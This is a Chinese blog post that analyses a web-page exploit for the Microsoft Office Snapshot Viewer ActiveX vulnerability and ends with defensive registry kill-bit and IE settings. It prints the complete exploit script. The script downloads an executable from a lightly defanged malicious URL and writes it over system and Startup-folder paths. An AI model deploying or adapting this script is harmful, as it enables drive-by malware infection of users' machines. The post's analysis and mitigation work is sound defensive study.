|
贴出完整的代码如下:
1<script type="text/javascript">
2function killErrors() {
3return true;
4}
5window.onerror = killErrors;
6
7var x;
8var obj;
9var mycars = new Array();
10mycars[0] = "c:/Program Files/Outlook Express/wab.exe";
11mycars[1] = "d:/Program Files/Outlook Express/wab.exe";
12mycars[2] = "e:/Program Files/Outlook Express/wab.exe";
13mycars[3] = "C:/Documents and Settings/All Users/「开始」菜单/程序/启动/Thunder.exe";
14mycars[4] = "C:/Documents and Settings/All Users/Start Menu/Programs/Startup/Thunder.exe";
15
16var objlcx = new ActiveXObject("snpvw.Snapshot Viewer Control.1");
17
18if(objlcx="[object]")
19{
20
21setTimeout('window.location = "ldap://"',3000);
22
23for (x in mycars)
24{
25obj = new ActiveXObject("snpvw.Snapshot Viewer Control.1")
26
27var buf1 = 'hxxp://jijiks8ahsda.cn/9/ck.exe';
28var buf2=mycars[x];
29
30obj.Zoom = 0;
31obj.ShowNavigationButtons = false;
32obj.AllowContextMenu = false;
33obj.SnapshotPath = buf1;
34
35try
36{
37 obj.CompressedPath = buf2;
38 obj.PrintSnapshot();
39
40}catch(e){}
41
42}
43}
44
45</script>
其中http换成了hxxp防止误入。
很明显,这个是Microsoft Office Snapshot Viewer ActiveX 漏洞利用代码,是Office系列软件中Access的漏洞,受这个漏洞影响的Access版本有2003、2002、2000,如果仅仅安装了Microsoft Snapshot Viewer 10.0.4622程序,也具有该漏洞。也难怪这个漏洞会使打全补丁的系统中招,目前官方没有给出补丁,其实世界上根本没有打全了补丁的系统。
我们看到代码中有这样的代码:
1mycars[0] = "c:/Program Files/Outlook Express/wab.exe";
2mycars[1] = "d:/Program Files/Outlook Express/wab.exe";
3mycars[2] = "e:/Program Files/Outlook Express/wab.exe";
4mycars[3] = "C:/Documents and Settings/All Users/「开始」菜单/程序/启动/Thunder.exe";
5mycars[4] = "C:/Documents and Settings/All Users/Start Menu/Programs/Startup/Thunder.exe";
可以看出,漏洞利用者想尽了利用的方式,mycars[0] = "c:/Program Files/Outlook Express/wab.exe";mycars[1] = "d:/Program Files/Outlook Express/wab.exe";mycars[2] = "e:/Program Files/Outlook Express/wab.exe";这个是能够触发直接运行恶意程序的利用方式,而后两句,一个是写入启动项,一个是写入迅雷开机自启动里面。甚至说即使不直接触发漏洞运行,写在启动里面,开机后恶意程序也会悄悄的运行。而代码里这句hxxp://jijiks8ahsda.cn/9/ck.exe就是运程下载恶意程序的地址了。
目前这个漏洞利用代码已经在网上传开了,而杀毒软件自带的漏洞更新程序并未见到这个官方给出的这个漏洞的补丁。
笔者GHOST完系统后,系统中自带了OFFICE2003,把这个hxxp://jijiks8ahsda.cn/9/ck.ex换成了一个自写的VB小程序亲自在本地测试了一下这个漏洞,运行该网页后弹出了程序窗口,并且在启动项里找到VB小程序。该漏洞对于未做安全防护的用户中马的概率十分的高,最后做了下全局域网的安全防护。
首先设置一下IE的安全级别,所有机器上INTERNET安全级别设置了为“高”,之后在受限站点里面加入该站点,加入该恶意站点。然后通过禁用COM组件安装包,来禁止该漏洞触发,这只能是临时解决方案。将以下代码复制到记事本。
1Windows Registry Editor Version 5.00
2[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F0E42D50-
3368C-11D0-AD81-00A0C90DC8D9}]
4"Compatibility Flags"=dword:00000400
5[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F0E42D60-
6368C-11D0-AD81-00A0C90DC8D9}]
7"Compatibility Flags"=dword:00000400
8[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F2175210-
9368C-11D0-AD81-00A0C90DC8D9}]
10"Compatibility Flags"=dword:00000400
把其另存为safe.reg,在全局域网所有机器上执行,导入注册表,这样就手工禁用了COM组件安装包。最后开启所有机器上的杀毒软件的网页木马拦截功能,等待官方的补丁出来后,迅速打上该补丁。 上一页 [1] [2] |
爱心红客
